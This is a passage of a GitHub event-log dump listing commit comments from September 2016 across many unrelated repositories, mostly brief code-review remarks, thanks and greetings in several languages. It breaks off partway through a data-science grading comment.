{"id":"4553435437","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18995994,"position":null,"line":null,"path":null,"commit_id":"7fd8b4902b90e7c12ba7299514803ffbddd3ebc9","created_at":"2016-09-13T04:48:00Z","updated_at":"2016-09-13T04:48:00Z","body":"Related to: backdrop/backdrop-issues#1361 "}},"created_at":"2016-09-13T04:48:00Z"}
{"id":"4553435447","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18995995,"position":null,"line":null,"path":null,"commit_id":"114859d33675fafbedaafa28b23fc40a1c0cea4d","created_at":"2016-09-13T04:48:01Z","updated_at":"2016-09-13T04:48:01Z","body":"Related to: backdrop/backdrop-issues#1361 "}},"created_at":"2016-09-13T04:48:01Z"}
{"id":"4553435674","type":"CommitCommentEvent","actor":{"login":"fischcheng"},"repo":{"name":"gcushen/hugo-academic"},"payload":{"comment":{"id":18995996,"position":null,"line":null,"path":null,"commit_id":"1f77c0572b78ee354ab1680a2b4210297248fc1f","created_at":"2016-09-13T04:48:09Z","updated_at":"2016-09-13T04:48:09Z","body":"Thanks for the updates. So, the solution is to add a condition to determine if the content is truncated. If so, than markdownify the truncated words. Very elegant. And thanks for reminding for the <!--more-->\r\ntag built in hugo. \r\n\r\nHowever, this solution only works if you manually truncate every post. If not, Hugo still takes its own Summary, and those part will not be mardownified. I wonder what's the original purpose for Hugo choosing not to render the summary, for speed? Thanks for the quick fix again! Cheers.\r\n\r\n"}},"created_at":"2016-09-13T04:48:09Z"}
{"id":"4553437001","type":"CommitCommentEvent","actor":{"login":"mazarsju"},"repo":{"name":"gama-platform/gama"},"payload":{"comment":{"id":18996000,"position":null,"line":null,"path":null,"commit_id":"80d3a372d6012f0f0478a29afada34ffca688719","created_at":"2016-09-13T04:48:43Z","updated_at":"2016-09-13T04:48:43Z","body":"Mmm yes agreed, I change this !\n\nOn Tue, Sep 13, 2016 at 11:47 AM, Alexis Drogoul <notifications@github.com>\nwrote:\n\n> Maybe keystone would be better for the keyword, no ?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gama-platform/gama/commit/80d3a372d6012f0f0478a29afada34ffca688719#commitcomment-18995987>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMYF4-NupL1f9--0yj6-q3kT44pTypgwks5qpirtgaJpZM4J7Sdj>\n> .\n>\n"}},"created_at":"2016-09-13T04:48:43Z"}
{"id":"4553437289","type":"CommitCommentEvent","actor":{"login":"tkrokli"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18996001,"position":120,"line":1907,"path":"src/server/game/Entities/Item/Item.cpp","commit_id":"a78aa3cf4ef3f33903ec9f06d8fdc46e81c51cb3","created_at":"2016-09-13T04:48:50Z","updated_at":"2016-09-13T04:48:50Z","body":"@Nelidon : Open a new issue page for that, it is impractical to discuss the issue here (to say the least)."}},"created_at":"2016-09-13T04:48:50Z"}
{"id":"4553437656","type":"CommitCommentEvent","actor":{"login":"nickdos"},"repo":{"name":"AtlasOfLivingAustralia/biocache-hubs"},"payload":{"comment":{"id":18996003,"position":null,"line":null,"path":null,"commit_id":"4eb38a1f3c72f962df9afc63838bc22342203bcd","created_at":"2016-09-13T04:49:01Z","updated_at":"2016-09-13T04:49:01Z","body":"Also affects avh-hub\r\n"}},"created_at":"2016-09-13T04:49:01Z"}
{"id":"4553439719","type":"CommitCommentEvent","actor":{"login":"bpasero"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":18996006,"position":49,"line":243,"path":"src/vs/workbench/parts/search/browser/openAnythingHandler.ts","commit_id":"99d95ace6c7a5718c2f8f406b5b0e8a83a2aba71","created_at":"2016-09-13T04:49:56Z","updated_at":"2016-09-13T04:49:56Z","body":"@chrmarti we need to delay the search when using symbol search because symbol search gets very slow for TypeScript if we start a search right from the first keypress. Once we have a cache for symbol search we should revisit this but as long as each keystroke causes an expensive search on the language service, we need the delay to get results in meaningful time.\r\n\r\nBtw I did quite some refactoring to support the setting for symbols, but I am sure you saw this by now 👍 "}},"created_at":"2016-09-13T04:49:56Z"}
{"id":"4553439919","type":"CommitCommentEvent","actor":{"login":"niemyjski"},"repo":{"name":"exceptionless/Foundatio.Repositories"},"payload":{"comment":{"id":18996008,"position":37,"line":234,"path":"src/Elasticsearch/Repositories/ElasticRepositoryBase.cs","commit_id":"b701bfab82192a79467323042a21fae96eccc76f","created_at":"2016-09-13T04:50:01Z","updated_at":"2016-09-13T04:50:01Z","body":"Almost just think this should be `query.SelectedFields.Union(new [] { \"id\" });` or add it if it doesn't exist"}},"created_at":"2016-09-13T04:50:01Z"}
{"id":"4553440941","type":"CommitCommentEvent","actor":{"login":"Godsoft029"},"repo":{"name":"Vertex-Client/Vertex-Client-PE"},"payload":{"comment":{"id":18996013,"position":21,"line":0,"path":"Vertex Client PE.js","commit_id":"4ad0aca8549fc516694f66bd3219a4ceea75b71c","created_at":"2016-09-13T04:50:27Z","updated_at":"2016-09-13T04:50:27Z","body":"This will show the onInterval Calls per seconds, which will be 1 I guess"}},"created_at":"2016-09-13T04:50:27Z"}
{"id":"4553444079","type":"CommitCommentEvent","actor":{"login":"krishanthi90"},"repo":{"name":"asingh8c/Codewarriors_Asg3"},"payload":{"comment":{"id":18996020,"position":null,"line":null,"path":null,"commit_id":"094ae54a4dc5eb0d819840e96bda19f867d3d8c6","created_at":"2016-09-13T04:51:46Z","updated_at":"2016-09-13T04:51:46Z","body":"Have to wait till integration testing"}},"created_at":"2016-09-13T04:51:46Z"}
{"id":"4553444299","type":"CommitCommentEvent","actor":{"login":"shrestha463"},"repo":{"name":"shrestha463/project"},"payload":{"comment":{"id":18996021,"position":2,"line":2,"path":"README.md","commit_id":"09ff46d4360adc4ff82f1adab22531cc30152f10","created_at":"2016-09-13T04:51:53Z","updated_at":"2016-09-13T04:51:53Z","body":"\r\n[main document11.docx](https://github.com/shrestha463/project/files/468916/main.document11.docx)\r\n"}},"created_at":"2016-09-13T04:51:53Z"}
{"id":"4553445533","type":"CommitCommentEvent","actor":{"login":"fasteningcode"},"repo":{"name":"fasteningcode/BeehiveUpdated"},"payload":{"comment":{"id":18996025,"position":4,"line":14,"path":"Beehive/Test/ReportBase.cs","commit_id":"a67138831d71735c0217c61b5c843d2cf34a0ee6","created_at":"2016-09-13T04:52:25Z","updated_at":"2016-09-13T04:52:25Z","body":"Please add the code for the same. "}},"created_at":"2016-09-13T04:52:25Z"}
{"id":"4553446456","type":"CommitCommentEvent","actor":{"login":"larsbrinkhoff"},"repo":{"name":"ForthHub/bubble_engine-subrepo"},"payload":{"comment":{"id":18996028,"position":null,"line":null,"path":null,"commit_id":"73af0d6548cb4860d289f10df7c1af82ec48c581","created_at":"2016-09-13T04:52:50Z","updated_at":"2016-09-13T04:52:50Z","body":"So can your two forks be removed now?"}},"created_at":"2016-09-13T04:52:50Z"}
{"id":"4553446550","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18996029,"position":null,"line":null,"path":null,"commit_id":"daa3e088eddfddef39e736a8902164d266f261d3","created_at":"2016-09-13T04:52:52Z","updated_at":"2016-09-13T04:52:52Z","body":"I can meet wednesday. When and where? "}},"created_at":"2016-09-13T04:52:52Z"}
{"id":"4553448822","type":"CommitCommentEvent","actor":{"login":"thierryvolpiatto"},"repo":{"name":"emacs-helm/helm"},"payload":{"comment":{"id":18996036,"position":8,"line":243,"path":"helm-org.el","commit_id":"7fcf4f8b62fb7cd136f3eb08b6316a8f022a6031","created_at":"2016-09-13T04:53:52Z","updated_at":"2016-09-13T04:53:52Z","body":"\nTianxiang Xiong <notifications@github.com> writes:\n\n> The org-previous-visible-heading function is introduced in Org-mode\n> version 8.3. It and its counterpart org-next-visible-heading are not\n> available in Emacs 24.5.50.1, which uses version 8.2.10.\n\nAh! thanks, I will try to find something compatible.\n\n--\nThierry\n"}},"created_at":"2016-09-13T04:53:52Z"}
{"id":"4553449189","type":"CommitCommentEvent","actor":{"login":"LeeHaYoungs"},"repo":{"name":"LeeHaYoungs/Lee_ha_young"},"payload":{"comment":{"id":18996039,"position":null,"line":null,"path":null,"commit_id":"166b2cef0a79ad92f5045b68ceaefea9ac9cb3ed","created_at":"2016-09-13T04:54:02Z","updated_at":"2016-09-13T04:54:02Z","body":"wow"}},"created_at":"2016-09-13T04:54:02Z"}
{"id":"4553450340","type":"CommitCommentEvent","actor":{"login":"zhjc1124"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18996041,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-13T04:54:31Z","updated_at":"2016-09-13T04:54:31Z","body":"刚刚我去试了试然后可以证明，真的可能是你电脑坏了(⊙ ▽ ⊙)(⊙ ▽ ⊙)(⊙ ▽ ⊙) @dzxx36gyy "}},"created_at":"2016-09-13T04:54:31Z"}
{"id":"4553453616","type":"CommitCommentEvent","actor":{"login":"nick2170"},"repo":{"name":"damoclark/buzzer.click"},"payload":{"comment":{"id":18996050,"position":16,"line":146,"path":"lib/Settings.js","commit_id":"9b160720db59399ff5fa14cafc2c53dc746e5fa8","created_at":"2016-09-13T04:55:56Z","updated_at":"2016-09-13T04:55:56Z","body":"Thanks! Yea you will have to show me the proper way to do this, sorry!"}},"created_at":"2016-09-13T04:55:56Z"}
{"id":"4553454756","type":"CommitCommentEvent","actor":{"login":"dushyantsingh1"},"repo":{"name":"OfficeDev/skype-android-app-sdk-samples"},"payload":{"comment":{"id":18996053,"position":null,"line":null,"path":null,"commit_id":"eedd1bb64887a3410bf60ead4c4cf167c1bc95d7","created_at":"2016-09-13T04:56:28Z","updated_at":"2016-09-13T04:56:28Z","body":"how to auto answer Skype for business call automatically."}},"created_at":"2016-09-13T04:56:28Z"}
{"id":"4553455568","type":"CommitCommentEvent","actor":{"login":"rogerlevy"},"repo":{"name":"ForthHub/bubble_engine-subrepo"},"payload":{"comment":{"id":18996055,"position":null,"line":null,"path":null,"commit_id":"73af0d6548cb4860d289f10df7c1af82ec48c581","created_at":"2016-09-13T04:56:51Z","updated_at":"2016-09-13T04:56:51Z","body":"Sure"}},"created_at":"2016-09-13T04:56:51Z"}
{"id":"4553457012","type":"CommitCommentEvent","actor":{"login":"ejsmith"},"repo":{"name":"exceptionless/Foundatio.Repositories"},"payload":{"comment":{"id":18996057,"position":null,"line":null,"path":null,"commit_id":"b701bfab82192a79467323042a21fae96eccc76f","created_at":"2016-09-13T04:57:33Z","updated_at":"2016-09-13T04:57:33Z","body":"Seems good to me."}},"created_at":"2016-09-13T04:57:33Z"}
{"id":"4553459003","type":"CommitCommentEvent","actor":{"login":"sonelam9"},"repo":{"name":"thanupakon/git101"},"payload":{"comment":{"id":18996064,"position":2,"line":2,"path":".gitignore","commit_id":"921bc331d5926418ba6b254bc96f1347febd02ab","created_at":"2016-09-13T04:58:25Z","updated_at":"2016-09-13T04:58:25Z","body":"hgfhgfh"}},"created_at":"2016-09-13T04:58:25Z"}
{"id":"4553459170","type":"CommitCommentEvent","actor":{"login":"prathamesh-sonpatki"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":18996065,"position":5,"line":245,"path":"railties/lib/rails/generators/app_base.rb","commit_id":"fbd1e98cf983572ca9884f17f933ffe92833632a","created_at":"2016-09-13T04:58:29Z","updated_at":"2016-09-13T04:58:29Z","body":"@rafaelfranca Was this changed for some testing?"}},"created_at":"2016-09-13T04:58:29Z"}
{"id":"4553460022","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":18996070,"position":54,"line":55,"path":"HelloWorld/Program.cs","commit_id":"cd1de5be6f6418f3cf407150f3d093fb4237ad1d","created_at":"2016-09-13T04:58:53Z","updated_at":"2016-09-13T04:58:53Z","body":"Хорошо, что ты обращаешь внимание на валидацию входных значений) Однако в данном случае, попытка привести данные в порядок - не лучший вариант. Одно дело, если бы наши параметры назывались value, bound1, bound2 - в таком случае перед нами действительно была бы неопределённость порядка входных значений, мы бы знали, только что есть две величины, как-то ограничивающие диапазон, но где из них какая не знали бы и нам это пришлось бы выяснить подобной проверкой. Но в нашем случае прямо сказано, что одно значение min, а другое max. И если мы выяслнили, что пользователь (опять же, пользователь кода, не программы) ввёл такие данные, что min > max, то у нашего пользователя что-то не то творится в голове и наш долг его об этом предупредить, а не стараться всё поправить и сделать вид, что  всё нормально) Короче, если встречаем min > max, то выдаём ошибку и прекращаем выполнение программы. Это ещё называется \"выкинуть исключение\" и записывается так: \"throw new Exception(\"min не может быть больше max\");\" Вскобках мы пишем сообщение для пользователя, чтобы он быстрее сообразил, в чём проблема и поправил код."}},"created_at":"2016-09-13T04:58:53Z"}
{"id":"4553460172","type":"CommitCommentEvent","actor":{"login":"KimWanGak"},"repo":{"name":"KimWanGak/ZzayoZaayo_1"},"payload":{"comment":{"id":18996071,"position":4,"line":4,"path":"TestProj.java","commit_id":"15a9a5dffe61597483501657e8e48ca456c423f1","created_at":"2016-09-13T04:58:56Z","updated_at":"2016-09-13T04:58:56Z","body":"String str =\"Hi~ Every One M name is \";"}},"created_at":"2016-09-13T04:58:56Z"}
{"id":"4553460639","type":"CommitCommentEvent","actor":{"login":"prathamesh-sonpatki"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":18996072,"position":null,"line":null,"path":null,"commit_id":"fbd1e98cf983572ca9884f17f933ffe92833632a","created_at":"2016-09-13T04:59:09Z","updated_at":"2016-09-13T04:59:09Z","body":"@rafaelfranca This should be backported as well. See https://github.com/rails/rails/issues/26474 for more details."}},"created_at":"2016-09-13T04:59:09Z"}
{"id":"4553460685","type":"CommitCommentEvent","actor":{"login":"zhjc1124"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18996073,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-13T04:59:11Z","updated_at":"2016-09-13T04:59:11Z","body":"反正我试了试这个新上传的这个好使(⊙ ▽ ⊙) "}},"created_at":"2016-09-13T04:59:11Z"}
{"id":"4553461088","type":"CommitCommentEvent","actor":{"login":"KimWanGak"},"repo":{"name":"KimWanGak/ZzayoZaayo_1"},"payload":{"comment":{"id":18996075,"position":7,"line":7,"path":"TestProj.java","commit_id":"15a9a5dffe61597483501657e8e48ca456c423f1","created_at":"2016-09-13T04:59:22Z","updated_at":"2016-09-13T04:59:22Z","body":"System.out.println(str+NAME);"}},"created_at":"2016-09-13T04:59:22Z"}
{"id":"4553461985","type":"CommitCommentEvent","actor":{"login":"dzxx36gyy"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18996079,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-13T04:59:47Z","updated_at":"2016-09-13T04:59:47Z","body":"@zhjc1124 ……有毒"}},"created_at":"2016-09-13T04:59:47Z"}
{"id":"4553462089","type":"CommitCommentEvent","actor":{"login":"devsejong"},"repo":{"name":"codechobostudy/movie-api"},"payload":{"comment":{"id":18996080,"position":114,"line":87,"path":"src/main/java/io/codechobo/domain/member/Member.java","commit_id":"0acd11a72f9f5e25beafc665ab393d38d827c89b","created_at":"2016-09-13T04:59:51Z","updated_at":"2016-09-13T04:59:51Z","body":"PreUpdate필요없이 이미 만들어진 엔티티는 트랜잭션으로만 묶여있으면 같이 업데이트 할 수 있어서요"}},"created_at":"2016-09-13T04:59:51Z"}
{"id":"4553462318","type":"CommitCommentEvent","actor":{"login":"KimWanGak"},"repo":{"name":"KimWanGak/ZzayoZaayo_1"},"payload":{"comment":{"id":18996081,"position":6,"line":6,"path":"TestProj.java","commit_id":"15a9a5dffe61597483501657e8e48ca456c423f1","created_at":"2016-09-13T04:59:57Z","updated_at":"2016-09-13T04:59:57Z","body":"System.out.println(\"str \"+NAME);"}},"created_at":"2016-09-13T04:59:57Z"}
{"id":"4553464781","type":"CommitCommentEvent","actor":{"login":"AlexisDrogoul"},"repo":{"name":"gama-platform/gama"},"payload":{"comment":{"id":18996086,"position":null,"line":null,"path":null,"commit_id":"2eb13e2c9e49c328c3436b2dd32268e0a14ce4ab","created_at":"2016-09-13T05:00:50Z","updated_at":"2016-09-13T05:00:50Z","body":"Sorry -- my point was that `keystone` alone was enough (not `keystone_parameters`) :)"}},"created_at":"2016-09-13T05:00:50Z"}
{"id":"4553465196","type":"CommitCommentEvent","actor":{"login":"KimWanGak"},"repo":{"name":"KimWanGak/ZzayoZaayo_1"},"payload":{"comment":{"id":18996088,"position":1,"line":1,"path":"Firstcode","commit_id":"166b2cef0a79ad92f5045b68ceaefea9ac9cb3ed","created_at":"2016-09-13T05:00:59Z","updated_at":"2016-09-13T05:00:59Z","body":"#include <stdio.h>"}},"created_at":"2016-09-13T05:00:59Z"}
{"id":"4553466352","type":"CommitCommentEvent","actor":{"login":"AlexCSilva"},"repo":{"name":"Zyk6870/OpenJK"},"payload":{"comment":{"id":18996090,"position":null,"line":null,"path":null,"commit_id":"5f272eae7c0a517535e29b2e35752a9a8906b3ee","created_at":"2016-09-13T05:01:29Z","updated_at":"2016-09-13T05:01:29Z","body":"Were they too OP?"}},"created_at":"2016-09-13T05:01:29Z"}
{"id":"4553469386","type":"CommitCommentEvent","actor":{"login":"tractorcow"},"repo":{"name":"tractorcow/recipe-plugin"},"payload":{"comment":{"id":18996095,"position":51,"line":63,"path":"src/RecipeInstaller.php","commit_id":"d715b1a779e3e890dee1e02469be0794a214f8d3","created_at":"2016-09-13T05:02:51Z","updated_at":"2016-09-13T05:02:51Z","body":"Yes that's right! Not sure what I was thinking."}},"created_at":"2016-09-13T05:02:51Z"}
{"id":"4553477283","type":"CommitCommentEvent","actor":{"login":"Workshop2"},"repo":{"name":"noobot/noobot"},"payload":{"comment":{"id":18996109,"position":null,"line":null,"path":null,"commit_id":"975fc4ad80698ea5a372e3f7af5b7342a7bbe539","created_at":"2016-09-13T05:05:55Z","updated_at":"2016-09-13T05:05:55Z","body":"Hehe, thanks Timmy"}},"created_at":"2016-09-13T05:05:55Z"}
{"id":"4553479023","type":"CommitCommentEvent","actor":{"login":"jonesde"},"repo":{"name":"moqui/moqui-framework"},"payload":{"comment":{"id":18996115,"position":144,"line":227,"path":"framework/src/main/groovy/org/moqui/impl/screen/ScreenUrlInfo.groovy","commit_id":"d2933518f438cb3e5ead16bd5c5a8a0d190038fc","created_at":"2016-09-13T05:06:42Z","updated_at":"2016-09-13T05:06:42Z","body":"It shouldn't contain more than one of the same, the first (#0) should be the webroot.xml screen in general. Did you see this on the most recent code or in older code where this commit was (March 1st)? There are a few different scenarios where ScreenUrlInfo is created, do you happen to know which this was (either code path, or something like screen being rendered versus URL on a screen)?"}},"created_at":"2016-09-13T05:06:42Z"}
{"id":"4553480686","type":"CommitCommentEvent","actor":{"login":"mazarsju"},"repo":{"name":"gama-platform/gama"},"payload":{"comment":{"id":18996119,"position":null,"line":null,"path":null,"commit_id":"2eb13e2c9e49c328c3436b2dd32268e0a14ce4ab","created_at":"2016-09-13T05:07:24Z","updated_at":"2016-09-13T05:07:24Z","body":"Ok, I can change it again, no problem !\n\nOn Tue, Sep 13, 2016 at 12:00 PM, Alexis Drogoul <notifications@github.com>\nwrote:\n\n> Sorry -- my point was that keystone alone was enough (not\n> keystone_parameters) :)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gama-platform/gama/commit/2eb13e2c9e49c328c3436b2dd32268e0a14ce4ab#commitcomment-18996086>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMYF49wHeCE9mknl6n6XaTcxz7PYNs5sks5qpi4DgaJpZM4J7Sy1>\n> .\n>\n"}},"created_at":"2016-09-13T05:07:24Z"}
{"id":"4553484513","type":"CommitCommentEvent","actor":{"login":"ashoksoni"},"repo":{"name":"ashoksoni/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":18996129,"position":null,"line":null,"path":null,"commit_id":"888e63357b80a1087a206dc2082bbf17788de036","created_at":"2016-09-13T05:09:09Z","updated_at":"2016-09-13T05:09:09Z","body":"Part of this commit.\r\nhttps://github.com/CyanogenMod/android_device_oneplus_oneplus2/commit/64b3923ad0ad4ba1117a906d3a10043049d400c0"}},"created_at":"2016-09-13T05:09:09Z"}
{"id":"4553484549","type":"CommitCommentEvent","actor":{"login":"samuraitruong"},"repo":{"name":"Necrobot-Private/NecroBot"},"payload":{"comment":{"id":18996130,"position":5,"line":351,"path":"PoGo.NecroBot.Logic/Tasks/UseNearbyPokestopsTask.cs","commit_id":"2491505ef2ac56cdc28420a621837f85f3edd581","created_at":"2016-09-13T05:09:10Z","updated_at":"2016-09-13T05:09:10Z","body":"seem incorrect:  should be  > :)"}},"created_at":"2016-09-13T05:09:10Z"}
{"id":"4553485053","type":"CommitCommentEvent","actor":{"login":"ashoksoni"},"repo":{"name":"ashoksoni/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":18996131,"position":null,"line":null,"path":null,"commit_id":"85da45f9620a6062275fa6174c29508f00c1a1aa","created_at":"2016-09-13T05:09:22Z","updated_at":"2016-09-13T05:09:22Z","body":"2nd part of this commit.\r\nhttps://github.com/CyanogenMod/android_device_oneplus_oneplus2/commit/64b3923ad0ad4ba1117a906d3a10043049d400c0"}},"created_at":"2016-09-13T05:09:22Z"}
{"id":"4553486702","type":"CommitCommentEvent","actor":{"login":"hanjihyun"},"repo":{"name":"hanjihyun/HanJi_Hyun"},"payload":{"comment":{"id":18996132,"position":null,"line":null,"path":null,"commit_id":"166b2cef0a79ad92f5045b68ceaefea9ac9cb3ed","created_at":"2016-09-13T05:10:11Z","updated_at":"2016-09-13T05:10:11Z","body":"hi"}},"created_at":"2016-09-13T05:10:11Z"}
{"id":"4553489195","type":"CommitCommentEvent","actor":{"login":"th6366"},"repo":{"name":"th6366/HurabonoProject"},"payload":{"comment":{"id":18996133,"position":null,"line":null,"path":null,"commit_id":"d5ea9f3aba478331d4af49e24b8aa26f679dc3d4","created_at":"2016-09-13T05:11:12Z","updated_at":"2016-09-13T05:11:12Z","body":"hi"}},"created_at":"2016-09-13T05:11:12Z"}
{"id":"4553490667","type":"CommitCommentEvent","actor":{"login":"b2acon"},"repo":{"name":"b2acon/b2acon3"},"payload":{"comment":{"id":18996135,"position":null,"line":null,"path":null,"commit_id":"a65d48453b1a56e9259368cea80a9047e4b4d697","created_at":"2016-09-13T05:11:52Z","updated_at":"2016-09-13T05:11:52Z","body":"Hello, nice meet you!"}},"created_at":"2016-09-13T05:11:52Z"}
{"id":"4553492819","type":"CommitCommentEvent","actor":{"login":"bdougie"},"repo":{"name":"imdoingotherthings/bloc-jams"},"payload":{"comment":{"id":18996136,"position":20,"line":20,"path":"scripts/collection.js","commit_id":"48cad5c3497974754e4ba31fdae2ea90e1d5f342","created_at":"2016-09-13T05:12:46Z","updated_at":"2016-09-13T05:12:46Z","body":"1 is always less than 12...."}},"created_at":"2016-09-13T05:12:46Z"}
{"id":"4553494620","type":"CommitCommentEvent","actor":{"login":"b2acon"},"repo":{"name":"b2acon/b2acon3"},"payload":{"comment":{"id":18996139,"position":null,"line":null,"path":null,"commit_id":"a65d48453b1a56e9259368cea80a9047e4b4d697","created_at":"2016-09-13T05:13:34Z","updated_at":"2016-09-13T05:13:34Z","body":"Hello, nice meet you!"}},"created_at":"2016-09-13T05:13:34Z"}
{"id":"4553494964","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18996140,"position":null,"line":null,"path":null,"commit_id":"9b83cd695bb6ad612fcdf7f0b41127bb6f312069","created_at":"2016-09-13T05:13:40Z","updated_at":"2016-09-13T05:13:40Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/9b83cd695bb6ad612fcdf7f0b41127bb6f312069#commitcomment-18995694) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/52ac07024e262189fdc05e0b30f6518ae7c2a3ee/daily_2016_9_13/report.md). cc @jrevels"}},"created_at":"2016-09-13T05:13:40Z"}
{"id":"4553498498","type":"CommitCommentEvent","actor":{"login":"3xp0n3nt"},"repo":{"name":"forerunnergames/peril"},"payload":{"comment":{"id":18996152,"position":30,"line":59,"path":"core/src/main/java/com/forerunnergames/peril/core/model/battle/DefaultAttackOrder.java","commit_id":"59cb2e4e2fe58f0b1267e6b5f1a175e8871cf2b0","created_at":"2016-09-13T05:15:17Z","updated_at":"2016-09-13T05:15:17Z","body":"> So this commit? \r\n\r\nMove along now, nothing to see here! ;-)"}},"created_at":"2016-09-13T05:15:17Z"}
{"id":"4553498828","type":"CommitCommentEvent","actor":{"login":"chunlinyao"},"repo":{"name":"moqui/moqui-framework"},"payload":{"comment":{"id":18996155,"position":144,"line":227,"path":"framework/src/main/groovy/org/moqui/impl/screen/ScreenUrlInfo.groovy","commit_id":"d2933518f438cb3e5ead16bd5c5a8a0d190038fc","created_at":"2016-09-13T05:15:25Z","updated_at":"2016-09-13T05:15:25Z","body":"I am using the most recent code. the ScreenUrlInfo is created from `DefaultScreenMacros.html.ftl` line 44 ~ 45."}},"created_at":"2016-09-13T05:15:25Z"}
{"id":"4553499646","type":"CommitCommentEvent","actor":{"login":"mateoclarke"},"repo":{"name":"open-austin/open-austin.github.io"},"payload":{"comment":{"id":18996158,"position":null,"line":null,"path":null,"commit_id":"6d0e8a5f741bff886dc6423ffe3ccdff12785be1","created_at":"2016-09-13T05:15:46Z","updated_at":"2016-09-13T05:15:46Z","body":"This was weird. I was getting a 404 error when I was trying to hit this post. I couldn't figure out why. So I shot in the dark and just renamed the file with the `.markdown` extension instead of `.md` (which we use all over the place and shouldn't make a difference.\r\n\r\n¯\\\\_(ツ)_/¯"}},"created_at":"2016-09-13T05:15:46Z"}
{"id":"4553502957","type":"CommitCommentEvent","actor":{"login":"ITskyIT"},"repo":{"name":"ITskyIT/CookMenu"},"payload":{"comment":{"id":18996163,"position":3,"line":3,"path":"README.md","commit_id":"c5614a90212d9cc6ab2d39887c3ed58d30bb645b","created_at":"2016-09-13T05:17:13Z","updated_at":"2016-09-13T05:17:13Z","body":"df "}},"created_at":"2016-09-13T05:17:13Z"}
{"id":"4553504577","type":"CommitCommentEvent","actor":{"login":"3xp0n3nt"},"repo":{"name":"forerunnergames/peril"},"payload":{"comment":{"id":18996172,"position":30,"line":59,"path":"core/src/main/java/com/forerunnergames/peril/core/model/battle/DefaultAttackOrder.java","commit_id":"59cb2e4e2fe58f0b1267e6b5f1a175e8871cf2b0","created_at":"2016-09-13T05:17:56Z","updated_at":"2016-09-13T05:17:56Z","body":"I'll try to be better about that from now on. (I wouldn't squash though; that would combine the two commits into one, which we're trying to avoid. And sometimes it's very useful to refer to old commits, so even squashing \"later\" wouldn't be preferable.)"}},"created_at":"2016-09-13T05:17:56Z"}
{"id":"4553506781","type":"CommitCommentEvent","actor":{"login":"Hiion"},"repo":{"name":"Hiion/whiteproject"},"payload":{"comment":{"id":18996177,"position":null,"line":null,"path":null,"commit_id":"fe0296508d5c5dca5fc1d4b336842408c13a02ce","created_at":"2016-09-13T05:18:56Z","updated_at":"2016-09-13T05:18:56Z","body":"헤더파일 선언이 잘못 되었습니다."}},"created_at":"2016-09-13T05:18:56Z"}
{"id":"4553507421","type":"CommitCommentEvent","actor":{"login":"Hiion"},"repo":{"name":"Hiion/whiteproject"},"payload":{"comment":{"id":18996178,"position":1,"line":1,"path":"gistfile1.txt","commit_id":"fe0296508d5c5dca5fc1d4b336842408c13a02ce","created_at":"2016-09-13T05:19:10Z","updated_at":"2016-09-13T05:19:10Z","body":"#include <stdio.h>"}},"created_at":"2016-09-13T05:19:10Z"}
{"id":"4553508242","type":"CommitCommentEvent","actor":{"login":"3xp0n3nt"},"repo":{"name":"forerunnergames/peril"},"payload":{"comment":{"id":18996180,"position":23,"line":23,"path":"core/src/main/java/com/forerunnergames/peril/core/model/state/events/BattleResultContinueEvent.java","commit_id":"59cb2e4e2fe58f0b1267e6b5f1a175e8871cf2b0","created_at":"2016-09-13T05:19:31Z","updated_at":"2016-09-13T05:19:31Z","body":"> Was BattleSetupEvent/BattleResultEvent your idea? I don't remember that being in my design.\r\n\r\nI thought it was already there, and I just modified / improved it. But, since this commit was ongoing for a month or more, I can't say with 100% certainty. You could always go back and look in the commit history."}},"created_at":"2016-09-13T05:19:31Z"}
{"id":"4553509406","type":"CommitCommentEvent","actor":{"login":"sambozek"},"repo":{"name":"ocj137/DSI-SF-2-ocjacob"},"payload":{"comment":{"id":18996184,"position":null,"line":null,"path":null,"commit_id":"1fd963afcf0254014da3ab37c03100bac2d1a95c","created_at":"2016-09-13T05:20:02Z","updated_at":"2016-09-13T05:20:02Z","body":"## 1\r\n1.1 * Your explination of the data is pretty minimal. It would work best to start off your report stating: 1. what your data is, 2. What you want to do with your data, 3. How you expect to clean/work with your data, 4. Problems you encountered and how they were resolved.  \r\n* Would be helpful to resize your histogram so that there's more to see rather than just a single bucket: `.hist(range=(x1, x2))` could be a good idea to do a .describe() first and see where the mean/median are and plot within 3 standard deviations.\r\n1.2 \r\n* Don't see too much data cleaning going on here. Did you look to see how it was distributed, if there were any outliers? Certainly a good idea to go back and look through this again. \r\n1.3\r\n* Hypothesis clear, but might use a little expansion. Why do you think that there is that correlation? What does *RP1PPTVAL* represent?\r\n1.4 Liked the heat map that you used for this particular situation. Are there any other visualizations that you could use in this situation?\r\n\r\n## 2\r\n2.1 Would 